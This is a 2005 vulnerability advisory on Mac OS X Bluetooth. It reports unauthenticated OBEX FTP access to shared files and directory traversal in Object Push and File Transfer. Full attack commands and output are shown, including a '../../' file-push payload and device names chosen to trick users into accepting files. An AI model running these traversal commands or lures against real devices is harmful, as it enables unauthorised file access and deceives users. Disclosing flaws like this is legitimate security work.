DMA[2005-0502a] - 'Apple OSX multiple Bluetooth vulnerabilities'
This was kinda rushed out... there is probably more typos than usual.
DMA[2005-0502a] - 'Apple OSX multiple Bluetooth vulnerabilities'
Author: Kevin Finisterre
Vendor: http://www.apple.com/bluetooth/
Product: 'Mac OSX <=10.3.9'
References:
http://www.digitalmunition.com/DMA[2005-0502a].txt
Description:
Starting with Mac OSX 10.2 Apple decided to include support for Bluetooth
devices. Apple's Bluetooth
Software Technology Preview was also available for a brief period of time on
Mac OSX 10.1.4. With
the Bluetooth technology that is integrated in Mac OS X, you can easily connect
your Apple computer
with your Palm OS-based handheld device, mobile phone and other peripherals
with Bluetooth technology.
In addition to the new PowerBook G4 portable line, Bluetooth-enabled computers
are available across
Apple's entire CPU product line, including iBook, iMac G5, eMac, Mac mini and
Power Mac G5. Bluetooth
is available in some cases as a standard feature and in others as an addon
option. You can even enable
your previous-generation iBook, iMac or Power Mac by simply plugging in a
Bluetooth USB Adapter and
letting Mac OSX takes care of the rest.
During the development of 'greenplaque' several trips to my local "Cup O' Joe"
began to turn up boat
loads of bluetoth devices. After multiple runs I started to notice that the
first 3 bytes of many of
the devices began with either 00:0D:93 or 00:03:93. A quick run to the OID
lookup offered by Jason
Coffer (http://coffer.com/mac_find/) I discovered that these devices were
Macintosh computers. For some
reason coffee shops seem to be yupie central, there are bluetooth enabled Macs
everywhere!
Once I got home and plugged one of my bluetooth sticks into my evil Orange iMac
it all started to make
sense. When you install OSX for the first time the hostname of the computer is
set to the owners name.
The OSX bluetooth settings derive the device name from the hostname. This
behavior explains why all of
the machines using the Apple OID had a Bluetooth device name of 'Firstname
Lastnameâs Computer'. Please
make note of the â in the device name. For some reason OSX loves to stuff this
character in place of an
apostrophe, knowing this could help you fingerprint a Macintosh device that is
not using the Apple
integrated Bluetooth radio.
The first thing I noticed about the Apple bluetooth implementation was that the
default behavior of the
OBEX Ftp service allowed access to the /Users/Shared directory and it did not
require any sort of user
authentication. The best part was that this service was enabled by default once
a user had logged into
the machine.
The following output demonstrates the ability to view files located in
/Users/Shared.
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<folder name="Faxes" created="19961103T141500Z" size="0"/>
<folder name="New Folder" created="19961103T141500Z" size="0"/>
<folder name="SC Info" created="19961103T141500Z" size="0"/>
</folder-listing>
The above behavior is actually what prompted me to contact Apple about their
Bluetooth software. The
initial conversation consisted of me arguing that "...just because someone on
my local LAN has access
to the files in /Users/Shared, that does not mean that I want some random Joe
Schmoe out on the sidwalk
to have access to them as well".
Shortly after this discovery Justin Tibbs and I started to notice that several
applications appear to
be using /Users/Shared as a config file repository. For example we found that
GarageBand, Quicken,
Microsoft RDP client, Blizzard World of Warcraft and iTunes all dumped random
files into /Users/Shared.
Even 'SC Info.sidb' aka the iTunes database of decryption keys seems to be up
for grabs over Bluetooth.
In addition to being able to browse the files located in /Users/Shared you also
have the ability to place
files onto the machine in the same directory. This may for example allow you to
place potentially
offensive or illegal material onto an individuals computer.
After I did a bit more research the fun really began. Aside from offering OBEX
File Transfer OSX also offers
OBEX Object Push services. Object push is usually used for passing business
cards to other Bluetooth users.
After my wonderful user experience with Widcomm I figured I would try some old
tricks with my new dog.
Object push has an option called "Folder for Accpeted Items". Under normal
circumstances all files should be
dropped into this directory, however this restriction is can be bypassed. OBEX
FTP appears to be vulnerable
to a directory transversal attack.
The first step is obviously to check what channel OPUSH is on.
animosity:/home/kfinisterre# sdptool browse 00:11:B1:07:BE:A7
Browsing 00:11:B1:07:BE:A7 ...
Service Name: Bluetooth-PDA-Sync
Service RecHandle: 0x10004
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Serial Port" (0x1101)
Version: 0x0100
Service Name: OBEX Object Push
Service RecHandle: 0x10002
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100
Service Name: OBEX File Transfer
Service RecHandle: 0x10003
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x00000100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100
Fire up an rfcomm connection.
animosity:/home/kfinisterre# rfcomm connect 0 00:11:B1:07:BE:A7 10
Connected /dev/rfcomm0 to 00:11:B1:07:BE:A7 on channel 10
Press CTRL-C for hangup
Drop a file in /tmp.
kfinisterre@animosity:~/ussp-push-0.3$ ./ussp-push /dev/rfcomm0 /etc/hosts
../../../../../../../../../tmp/blah
pushing file /etc/hosts
name=/etc/hosts, size=257
Registered transport
set user data
created new objext
started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!
Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ../../../../../../../../../tmp/blah, path: /etc/hosts, size: 257
At this point the Mac user is prompted by a window with the title 'incomming
File Transfer'. The options
are to 'Decline' or 'Accept' with the ability to also 'Accept all without
warning' by clicking a check
box. There is a bluetooth icon with the device name of the connecting machine.
I find this to be very
useful in helping to get a user to click accept.
Consider the following as an example.
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Sexy*Blonde*5*tables*over
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Critical*Apple*Bluetooth*Update
animosity:/home/kfinisterre/ussp-push-0.3# hciconfig hci0 name
*Apple*Update*Please*Click*Accept
Luckily for an attacker only the basename() form of the file being transfered
is shown. In the above example
all we would see is 'blah' as the incomming filename. Odds are that most
'toothy' males would accept any file
from the Sexy Blonde 5 tables over.
After you coax the user to accept the file either via clicking 'Accept' or
pressing enter the above it will
promptly be dropped in /tmp.
Kevin-Finisterres-Computer:~kevinfinisterre$ ls /tmp
501 blah mcx_compositor
The final issue that I was able to take advantage of is quite convient in
determining if the above attack was
successful. Lucky for us OBEX File Transfer service also happens to be
vulnerable to directory transversal.
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l
-c ../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<file name="4D WebSTAR Installer.log" created="19961103T141500Z" size="195662"/>
<folder name="johnh" created="19961103T141500Z" size="0"/>
<folder name="kevinfinisterre" created="19961103T141500Z" size="0"/>
<folder name="Shared" created="19961103T141500Z" size="0"/>
<folder name="webstar" created="19961103T141500Z" size="0"/>
</folder-listing>
animosity:/home/kfinisterre# qobexclient -t bluetooth -d 00:11:B1:07:BE:A7 -l
-c ../../
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE folder-listing SYSTEM "obex-folder-listing.dtd">
<folder-listing version="1.0">
<parent-folder />
<folder name="Applications" created="19961103T141500Z" size="0"/>
<folder name="automount" created="19961103T141500Z" size="0"/>
<folder name="bin" created="19961103T141500Z" size="0"/>
<folder name="cores" created="19961103T141500Z" size="0"/>
<file name="Desktop DB" created="19961103T141500Z" size="3584"/>
<file name="Desktop DF" created="19961103T141500Z" size="4482"/>
<folder name="dev" created="19961103T141500Z" size="0"/>
<folder name="Developer" created="19961103T141500Z" size="0"/>
<file name="etc" created="19961103T141500Z" size="11"/>
<folder name="Library" created="19961103T141500Z" size="0"/>
<file name="mach" created="19961103T141500Z" size="9"/>
<file name="mach.sym" created="19961103T141500Z" size="570532"/>
<file name="mach_kernel" created="19961103T141500Z" size="3863716"/>
<folder name="Network" created="19961103T141500Z" size="0"/>
<folder name="private" created="19961103T141500Z" size="0"/>
<folder name="sbin" created="19961103T141500Z" size="0"/>
<folder name="System" created="19961103T141500Z" size="0"/>
<file name="tmp" created="19961103T141500Z" size="11"/>
<folder name="Users" created="19961103T141500Z" size="0"/>
<folder name="usr" created="19961103T141500Z" size="0"/>
<file name="var" created="19961103T141500Z" size="11"/>
<folder name="Volumes" created="19961103T141500Z" size="0"/>
</folder-listing>
I can not confirm nor deny that files can be placed or retrieved via OBEX FTP
and the ../../ method.
I have only been able to list files using my current obex client. A modified
client my yield different
results.
enjoy.
Work Around:
Unplug your dongle! Install 2005-005 update or disable bluetooth support within
the OS.
http://www.apple.com/support/downloads/
Timeline associated with this bug:
Thu, 10 Mar 2005 Follow-up: 7841131 assigned by auto ticketing sytem.
Sat, 12 Mar 2005 dispute usage of /Users/Shared with bluetooth with Apple.
Thu, 17 Mar 2005 Apple is 'still investigating this issue'. Introduce
greenplaque to Apple.
Sat, 19 Mar 2005 Justin Tibbs (jay ex tizzle) pointed out World of Warcraft
uses /Users/Shared
Sat, 19 Mar 2005 JxT and KF discover and report that iTunes leaves its auth db
in /Users/Shared
Sun, 20 Mar 2005 OBEX Object Push directory transversal issues discovered and
reported.
Mon, 04 Apr 2005 OBEX File transfer daemon flaws and reported
Sat, 09 Apr 2005 more Apple followups
Thu, 23 Apr 2005 AppleSeed testing begins
Tue, 03 May 2005 I guess someone forgot to tell me, today is apparantly public
disclosure day.
All your bluetooth are belong to greenplaque!
-KF